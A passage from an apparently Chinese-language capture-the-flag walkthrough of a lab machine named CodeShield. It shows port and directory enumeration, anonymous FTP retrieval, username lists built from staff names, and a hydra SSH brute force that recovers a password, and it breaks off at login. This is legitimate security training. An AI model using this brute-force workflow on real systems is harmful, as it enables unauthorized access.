AAAAC3NzaC1lZDI1NTE5AAAAIPXrs+Ma5M6viFKpjdt5NluM7u7W2jtKcyf4oe2UtFM+\n3389\/tcp open ms-wbt-server syn-ack xrdp\n22222\/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 2a:49:28:84:25:99:62:e8:29:68:88:d6:36:be:8e:d6 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMgmhyYVdTpcZBiKVuLSA2gn7UAxrhbSO7ycTn7usJq\/3mcYdGYZacNcCv8qraxBcrdp2zITdCxstX2Fhy\/EG5Q=\n| 256 20:9f:5b:3f:52:eb:a9:60:27:39:3b:e7:d8:17:8d:70 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJdUVPSunKWnNtVeXr0fSi7Nvs2f\/J7wQpoTfOEZVpcT\nService Info: Hosts: -mail.codeshield.hmv, mail.codeshield.hmv; OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ sudo gobuster dir -u https:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404 \n[sudo] password for kali: \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: https:\/\/10.0.2.22\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\nError: error on running gobuster: unable to connect to https:\/\/10.0.2.22\/: Get "https:\/\/10.0.2.22\/": tls: failed to verify certificate: x509: cannot validate certificate for 10.0.2.22 because it doesn't contain any IP SANs\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ sudo gobuster dir -u https:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404 -k\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: https:\/\/10.0.2.22\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 401,403,404,301\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 60375]\n\/contact.html (Status: 200) [Size: 19386]\n\/about.html (Status: 200) [Size: 27169]\n\/blog.html (Status: 200) [Size: 37661]\n\/detail.html (Status: 200) [Size: 36406]\n\/service.html (Status: 200) [Size: 23979]\n\/feature.html (Status: 200) [Size: 18200]\n\/team.html (Status: 200) [Size: 23225]\n\/quote.html (Status: 200) [Size: 18554]\n\/price.html (Status: 200) [Size: 23856]\n\/robots.txt (Status: 200) [Size: 26]\n\/LICENSE.txt (Status: 200) [Size: 1422]\n\/testimonial.html (Status: 200) [Size: 18531]\nProgress: 139602 \/ 882244 (15.82%)<\/code><\/pre>\n\u7b2c\u4e00\u6b21\u62a5\u9519\u662f\u56e0\u4e3a\u670d\u52a1\u5668\u4f7f\u7528\u7684 TLS \u8bc1\u4e66\u672a\u5305\u542b\u76ee\u6807 IP \u5730\u5740\uff08\u5982 10.0.2.22<\/code>\uff09\u4f5c\u4e3a SAN\uff0c\u5bfc\u81f4\u5ba2\u6237\u7aef\u65e0\u6cd5\u9a8c\u8bc1\u8bc1\u4e66\u6709\u6548\u6027\uff0c\u5728 Gobuster \u547d\u4ee4\u4e2d\u6dfb\u52a0 -k<\/code> \u6216 --no-tls-validation<\/code> \u53c2\u6570\uff0c\u8df3\u8fc7 TLS \u8bc1\u4e66\u9a8c\u8bc1\u3002<\/p>\n\u4f46\u662f\u592a\u6162\u4e86\uff0c\u4e14\u6ca1\u53d1\u73b0\u5565\u4e1c\u897f\uff0c\u5c31\u6362\u4e86\u4e00\u4e2a\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ curl -k https:\/\/$IP\/robots.txt\nUser-agent: *\nDisallow: \/<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ sudo dirsearch -u https:\/\/$IP \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/codeshield\/reports\/https_10.0.2.22\/_25-05-29_23-55-44.txt\n\nTarget: https:\/\/10.0.2.22\/\n\n[23:55:44] Starting: \n[23:55:45] 301 - 162B - \/js -> https:\/\/10.0.2.22\/js\/\n[23:55:45] 403 - 548B - \/%2e%2e;\/test\n[23:55:57] 301 - 162B - \/.well-known\/caldav -> https:\/\/10.0.2.22\/SOGo\/dav\n[23:55:57] 301 - 162B - \/.well-known\/carddav -> https:\/\/10.0.2.22\/SOGo\/dav\n[23:56:03] 200 - 27KB - \/about.html\n[23:56:09] 403 - 548B - \/admin\/.config\n[23:56:24] 403 - 548B - \/admpar\/.ftppass\n[23:56:24] 403 - 548B - \/admrev\/.ftppass\n[23:56:32] 403 - 548B - \/bitrix\/.settings\n[23:56:32] 403 - 548B - \/bitrix\/.settings.php\n[23:56:32] 403 - 548B - \/bitrix\/.settings.php.bak\n[23:56:32] 403 - 548B - \/bitrix\/.settings.bak\n[23:56:40] 200 - 19KB - \/contact.html\n[23:56:42] 301 - 162B - \/css -> https:\/\/10.0.2.22\/css\/\n[23:56:51] 403 - 548B - \/ext\/.deps\n[23:56:51] 200 - 34KB - \/favicon.ico\n[23:56:59] 301 - 162B - \/img -> https:\/\/10.0.2.22\/img\/\n[23:57:03] 200 - 5KB - \/iredadmin\n[23:57:03] 403 - 548B - \/js\/\n[23:57:05] 403 - 548B - \/lib\/\n[23:57:05] 403 - 548B - \/lib\/flex\/uploader\/.settings\n[23:57:05] 403 - 548B - \/lib\/flex\/uploader\/.flexProperties\n[23:57:05] 301 - 162B - \/lib -> https:\/\/10.0.2.22\/lib\/\n[23:57:05] 403 - 548B - \/lib\/flex\/varien\/.actionScriptProperties\n[23:57:05] 403 - 548B - \/lib\/flex\/varien\/.project\n[23:57:05] 403 - 548B - \/lib\/flex\/varien\/.flexLibProperties\n[23:57:05] 403 - 548B - \/lib\/flex\/uploader\/.actionScriptProperties\n[23:57:05] 403 - 548B - \/lib\/flex\/varien\/.settings\n[23:57:05] 403 - 548B - \/lib\/flex\/uploader\/.project\n[23:57:06] 200 - 1KB - \/LICENSE.txt\n[23:57:09] 200 - 5KB - \/mail\/\n[23:57:09] 301 - 162B - \/mail -> https:\/\/10.0.2.22\/mail\/\n[23:57:09] 403 - 548B - \/mailer\/.env\n[23:57:13] 502 - 552B - \/Microsoft-Server-ActiveSync\/\n[23:57:16] 401 - 574B - \/netdata\/\n[23:57:17] 303 - 0B - \/newsletter\/ -> https:\/\/10.0.2.22\/iredadmin\/newsletter\n[23:57:32] 403 - 548B - \/resources\/sass\/.sass-cache\/\n[23:57:32] 403 - 548B - \/resources\/.arch-internal-preview.css\n[23:57:32] 200 - 26B - \/robots.txt\n[23:57:42] 403 - 548B - \/status?full=true\n[23:57:42] 403 - 548B - \/status\n[23:57:49] 403 - 548B - \/twitter\/.env\n\nTask Completed<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\nftp\u670d\u52a1\u63a2\u6d4b<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ftp $IP \nConnected to 10.0.2.22.\n220 (vsFTPd 3.0.5)\nName (10.0.2.22:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls\n229 Entering Extended Passive Mode (|||51498|)\n150 Here comes the directory listing.\n-rw-rw-r-- 1 1002 1002 2349914 Aug 30 2023 CodeShield_pitch_deck.pdf\n-rw-rw-r-- 1 1003 1003 67520 Aug 28 2023 Information_Security_Policy.pdf\n-rw-rw-r-- 1 1004 1004 226435 Aug 28 2023 The_2023_weak_password_report.pdf\n226 Directory send OK.\nftp> mget *\nmget CodeShield_pitch_deck.pdf [anpqy?]? \n229 Entering Extended Passive Mode (|||57895|)\n150 Opening BINARY mode data connection for CodeShield_pitch_deck.pdf (2349914 bytes).\n100% |************************************************************************************************************************************************| 2294 KiB 4.37 MiB\/s 00:00 ETA\n226 Transfer complete.\n2349914 bytes received in 00:00 (4.35 MiB\/s)\nmget Information_Security_Policy.pdf [anpqy?]? \n229 Entering Extended Passive Mode (|||56628|)\n150 Opening BINARY mode data connection for Information_Security_Policy.pdf (67520 bytes).\n100% |************************************************************************************************************************************************| 67520 672.40 KiB\/s 00:00 ETA\n226 Transfer complete.\n67520 bytes received in 00:00 (658.94 KiB\/s)\nmget The_2023_weak_password_report.pdf [anpqy?]? \n229 Entering Extended Passive Mode (|||64848|)\n150 Opening BINARY mode data connection for The_2023_weak_password_report.pdf (226435 bytes).\n100% |************************************************************************************************************************************************| 221 KiB 2.46 MiB\/s 00:00 ETA\n226 Transfer complete.\n226435 bytes received in 00:00 (2.40 MiB\/s)\nftp> cd ..\n250 Directory successfully changed.\nftp> ls\n229 Entering Extended Passive Mode (|||24645|)\n150 Here comes the directory listing.\n-rw-rw-r-- 1 1002 1002 2349914 Aug 30 2023 CodeShield_pitch_deck.pdf\n-rw-rw-r-- 1 1003 1003 67520 Aug 28 2023 Information_Security_Policy.pdf\n-rw-rw-r-- 1 1004 1004 226435 Aug 28 2023 The_2023_weak_password_report.pdf\n226 Directory send OK.\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u524d\u9762\u4fe1\u606f\u641c\u96c6\u5230\u7684\u51e0\u4e2apdf\u6587\u4ef6\u5168\u90fd\u4e0b\u8f7d\u4e0b\u6765\u4e86\uff0c\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\n- \n
CodeShield_pitch_deck.pdf<\/code>\u662f\u4e00\u4e2appt<\/p>\n<\/li>\n- \n
Information_Security_Policy.pdf<\/code>\u662f\u4fe1\u606f\u5b89\u5168\u653f\u7b56<\/p>\n<\/li>\n- \n
2023 The_2023_weak_password_report.pdf<\/code>\u662f\u4e00\u4efd\u5f31\u5bc6\u7801\u62a5\u544a<\/p>\n<\/li>\n<\/ul>\n\u53d1\u73b0\u4e86\u4e00\u4e9b\u6709\u53ef\u80fd\u5229\u7528\u5230\u7684\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u4e86Jessica Carlson<\/code>\u4ee5\u53ca\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n<\/div><\/p>\n\u5b58\u5728\u57df\u540d\u89e3\u6790\uff0c\u53ef\u4ee5\u52a0\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ sudo vim \/etc\/hosts\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat \/etc\/hosts | grep hmv \n10.0.2.22 codeshield.hmv<\/code><\/pre>\n<\/div><\/p>\n\u6dfb\u52a0\u4e00\u4e0b\u5230\u5bc6\u7801\u4e2d\uff0c\u8bf4\u4e0d\u5b9a\u540e\u9762\u9700\u8981\u7206\u7834\u5565\u7684\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat pass \nXxxxxxxxx001\nPassword123!\nGreatplace2work!\nDiciembre@2017\nHairdresser1!\n1qa2ws3ed4rf\nXXXX12345678\nHairdresser1\nXxxxxxxxx002\nXxxxxxxxxx01<\/code><\/pre>\nweb\u63a2\u6d4b<\/h3>\n
\u53d1\u73b0\u9776\u673a\u5f00\u542f\u4e8680<\/code>\u548c443<\/code>\u7aef\u53e3\uff0c\u663e\u7136\u662f\u6709web\u670d\u52a1\u7684\uff0c\u6253\u5f00\u53d1\u73b0\u51e0\u5904\u540d\u5355\uff1a<\/p>\n<\/div><\/p>\n<\/div><\/p>\n\u628a\u540d\u5355\u8bb0\u5f55\u4e00\u4e0b\uff1a<\/p>\n
Jessica Carlson\nMohammed Mansour\nXian Tan\nAnnabella Cocci\nThomas Mitchell\nPatrick Early\nBob Watson\nJennifer Cruise\nJohn Doe\nAngelina Johnson<\/code><\/pre>\n\u4ee5\u53ca\u8bc4\u8bba\u91cc\u63d0\u5230\u4e86\u4e00\u4e2a\u4ebaKevin Vaidez<\/code>\u3002<\/p>\n\u4f46\u662f\u6839\u636e\u7ecf\u9a8c\uff0c\u4e00\u822c\u90fd\u662f\u59d3\u6216\u540d\u4f5c\u4e3a\u8d26\u53f7\uff0c\u8bd5\u4e00\u4e0b\uff1b<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ awk '{for(i=1;i<=NF;i++) print $i}' user >> user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat user | grep -v '^$'\nJessica Carlson\nMohammed Mansour\nXian Tan\nAnnabella Cocci\nThomas Mitchell\nPatrick Early\nBob Watson\nJennifer Cruise\nJohn Doe\nAngelina Johnson\nJessica\nCarlson\nMohammed\nMansour\nXian\nTan\nAnnabella\nCocci\nThomas\nMitchell\nPatrick\nEarly\nBob\nWatson\nJennifer\nCruise\nJohn\nDoe\nAngelina\nJohnson\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat user | tr 'A-Z' 'a-z' >> user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cat user \nJessica Carlson\nMohammed Mansour\nXian Tan\nAnnabella Cocci\nThomas Mitchell\nPatrick Early\nBob Watson\nJennifer Cruise\nJohn Doe\nAngelina Johnson\nKevin Vaidez\nJessica\nCarlson\nMohammed\nMansour\nXian\nTan\nAnnabella\nCocci\nThomas\nMitchell\nPatrick\nEarly\nBob\nWatson\nJennifer\nCruise\nJohn\nDoe\nAngelina\nJohnson\nKevin\nVaidez\njessica carlson\nmohammed mansour\nxian tan\nannabella cocci\nthomas mitchell\npatrick early\nbob watson\njennifer cruise\njohn doe\nangelina johnson\nkevin vaidez\njessica\ncarlson\nmohammed\nmansour\nxian\ntan\nannabella\ncocci\nthomas\nmitchell\npatrick\nearly\nbob\nwatson\njennifer\ncruise\njohn\ndoe\nangelina\njohnson\nkevin\nvaidez<\/code><\/pre>\n\u8fd8\u53d1\u73b0\u4e86\u4e00\u4e2a\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u5b58\u5728\u4e00\u4e2a\u767b\u5f55\u754c\u9762\u3002<\/p>\n
\u7206\u7834<\/h3>\n
\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff0c\u4f46\u662f\u672a\u679c\uff0c\u770b\u4e86\u522b\u7684\u5e08\u5085\u7684wp\uff0c\u53d1\u73b0\u662f\u4f7f\u7528\u4e86\u4e00\u4e2a\u5de5\u5177\u751f\u6210\u7528\u6237\u540d\uff0c\u989d\uff0c\u8fd9\u4e00\u70b9\u7684\u601d\u8def\u6765\u6e90\u53ef\u80fd\u662f\u56e0\u4e3a\u524d\u9762\u7684\u90a3\u4e2a\u90ae\u7bb1\u7684\u7528\u6237\u540d\u6709\u4e9b\u5947\u602a\u60f3\u5230\u7684\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ git clone https:\/\/github.com\/w0Tx\/generate-ad-username.git\nCloning into 'generate-ad-username'...\nremote: Enumerating objects: 14, done.\nremote: Counting objects: 100% (14\/14), done.\nremote: Compressing objects: 100% (14\/14), done.\nremote: Total 14 (delta 3), reused 3 (delta 0), pack-reused 0 (from 0)\nReceiving objects: 100% (14\/14), 4.44 KiB | 758.00 KiB\/s, done.\nResolving deltas: 100% (3\/3), done.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ cd generate-ad-username\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ ls -la\ntotal 24\ndrwxr-xr-x 3 kali kali 4096 May 30 01:40 .\ndrwxr-xr-x 4 kali kali 4096 May 30 01:40 ..\n-rw-r--r-- 1 kali kali 1974 May 30 01:40 ADGenerator.py\ndrwxr-xr-x 8 kali kali 4096 May 30 01:40 .git\n-rw-r--r-- 1 kali kali 1030 May 30 01:40 README.md\n-rw-r--r-- 1 kali kali 75 May 30 01:40 test.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ cat README.md \n# Why ?\n\nThis script has been made for quick creation of usernames to use against AD when you only have the names and surnames for OSCP, Labs... \n\nIt's not perfect, feel free to modify it.\n\nNaming convention can be found there : [https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/index.html#recon-active-directory-no-credssessions](https:\/\/book.hacktricks.wiki\/en\/windows-hardening\/active-directory-methodology\/index.html#recon-active-directory-no-credssessions)\n\n```\nNameSurname\nName.Surname\nNamSur (3letters of each)\nNam.Sur\nNSurname\nN.Surname\nSurnameName\nSurname.Name\nSurnameN\nSurname.N\n```\n\n# How ?\n\nInput names should be seperated by ','.\n\n```\ntest,test2\ntest3,test4\n```\n\nThen : `python3 ADGenerator.py names.txt`\n\nExample of output : \n\n```\nmetodijelizabeta\nmetodij-elizabeta\nmetodij.elizabeta\nmeteli\nmet-eli\nmet.eli\nmelizabeta\nm-elizabeta\nm.elizabeta\nelizabetametodij\nelizabeta-metodij\nelizabeta.metodij\nelimet\neli-met\neli.met\nemetodij\ne-metodij\ne.metodij\nelizabetam\nelizabeta-m\nelizabeta.m\n```\n<\/code><\/pre>\n\u8fd9\u6837\u7684\u8bdd\uff0c\u5c31\u8981\u7528\u56de\u6700\u539f\u59cb\u7684\u90a3\u4e2auser\u4e86\uff1a<\/p>\n
Jessica Carlson\nMohammed Mansour\nXian Tan\nAnnabella Cocci\nThomas Mitchell\nPatrick Early\nBob Watson\nJennifer Cruise\nJohn Doe\nAngelina Johnson\nKevin Vaidez<\/code><\/pre>\n\u518d\u4fee\u6539\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ cat new_user | tr ' ' ',' > user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ cat user \nJessica,Carlson\nMohammed,Mansour\nXian,Tan\nAnnabella,Cocci\nThomas,Mitchell\nPatrick,Early\nBob,Watson\nJennifer,Cruise\nJohn,Doe\nAngelina,Johnson\nKevin,Vaidez<\/code><\/pre>\n\u7136\u540e\u5c31\u53ef\u4ee5\u4f7f\u7528\u811a\u672c\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ python3 ADGenerator.py user > ..\/user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ cat ..\/user | head -n 10\njessicacarlson\njessica-carlson\njessica.carlson\njescar\njes-car\njes.car\njcarlson\nj-carlson\nj.carlson\ncarlsonjessica<\/code><\/pre>\n\u5c1d\u8bd5\u7206\u7834\u5373\u53ef\uff0c\u9700\u8981\u6ce8\u610f\u5230\u4e3b\u673a\u4e0a\u5b58\u572822<\/code>\u548c22222<\/code>\u4e24\u4e2assh<\/code>\u7aef\u53e3\uff0c\u9700\u8981\u8fdb\u884c\u7504\u522b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ssh valdezk@$IP -p 22222\nThe authenticity of host '[10.0.2.22]:22222 ([10.0.2.22]:22222)' can't be established.\nED25519 key fingerprint is SHA256:Y+iV2eHvzSBp6ZbF+2VqTJdZ5+XyH5tVaxNCzS7tp3I.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? \nHost key verification failed.<\/code><\/pre>\n\u53d1\u73b0\u516c\u94a5\u4e0d\u5339\u914d\uff0c\u4e34\u65f6\u7981\u7528\u4e3b\u673a\u5bc6\u94a5\u9a8c\u8bc1\uff08\u4ec5\u9650\u5185\u7f51\u6d4b\u8bd5\uff09<\/strong><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ssh -o StrictHostKeyChecking=no hgbe@10.0.2.22 \nWarning: Permanently added '10.0.2.22' (ED25519) to the list of known hosts.\nhgbe@10.0.2.22's password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ssh -o StrictHostKeyChecking=no hgbe@10.0.2.22 -p 22222\n @@@ \n @@@@@@@@@ @@@@@@ \n @@@@@@@@@@@@@@ (@@ \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557 \n @@@@@@@@@@@@@ @@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@@@ @@@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@ @@ \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \n @@@@@@@@@@ @@@ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \n @@@@@@@ @@@ \n @@@@@@@ \n\n _______________________________________________________________________________________________________\n | _WARNING: This system is restricted to authorized users!___________________________________________ |\n | | | |\n | | IT IS AN OFFENSE TO CONTINUE WITHOUT PROPER AUTHORIZATION. | |\n | | | |\n | | This system is restricted to authorized users. | | \n | | Individuals who attempt unauthorized access will be prosecuted. | | \n | | If you're unauthorized, terminate access now! | | \n | | | |\n | | | |\n | |___________________________________________________________________________________________________| |\n |_______________________________________________________________________________________________________|\nhgbe@10.0.2.22's password: <\/code><\/pre>\n\u5f88\u660e\u663e\uff0c\u4f18\u5148\u5c1d\u8bd5\u4e0b\u9762\u7684\uff0c\u5c1d\u8bd5\u7206\u7834\uff0c\u7531\u4e8e\u770b\u4e86\u5e08\u5085\u4eec\u7684\u7ed3\u679c\u6211\u8fd9\u91cc\u5c31\u76f4\u63a5\u505a\u505a\u6837\u5b50\u4e86\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ hydra -L user -P pass ssh:\/\/$IP -f -s 22222 -V \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-05-30 02:29:21\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 20 login tries (l:2\/p:10), ~2 tries per task\n[DATA] attacking ssh:\/\/10.0.2.22:22222\/\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Xxxxxxxxx001" - 1 of 20 [child 0] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Password123!" - 2 of 20 [child 1] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Greatplace2work!" - 3 of 20 [child 2] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Diciembre@2017" - 4 of 20 [child 3] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Hairdresser1!" - 5 of 20 [child 4] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "1qa2ws3ed4rf" - 6 of 20 [child 5] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "XXXX12345678" - 7 of 20 [child 6] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Hairdresser1" - 8 of 20 [child 7] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Xxxxxxxxx002" - 9 of 20 [child 8] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "mitchellt" - pass "Xxxxxxxxxx01" - 10 of 20 [child 9] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Xxxxxxxxx001" - 11 of 20 [child 10] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Password123!" - 12 of 20 [child 11] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Greatplace2work!" - 13 of 20 [child 12] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Diciembre@2017" - 14 of 20 [child 13] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "Hairdresser1!" - 15 of 20 [child 14] (0\/0)\n[ATTEMPT] target 10.0.2.22 - login "valdezk" - pass "1qa2ws3ed4rf" - 16 of 20 [child 15] (0\/0)\n[22222][ssh] host: 10.0.2.22 login: valdezk password: Greatplace2work!\n[STATUS] attack finished for 10.0.2.22 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-05-30 02:29:23<\/code><\/pre>\n\u5f97\u5230\u4e00\u4e32\u65b0\u7684\u51ed\u8bc1\uff1a<\/p>\n
valdezk:Greatplace2work!<\/code><\/pre>\n\u767b\u5f55\u770b\u4e00\u4e0b\uff1a<\/p>\n
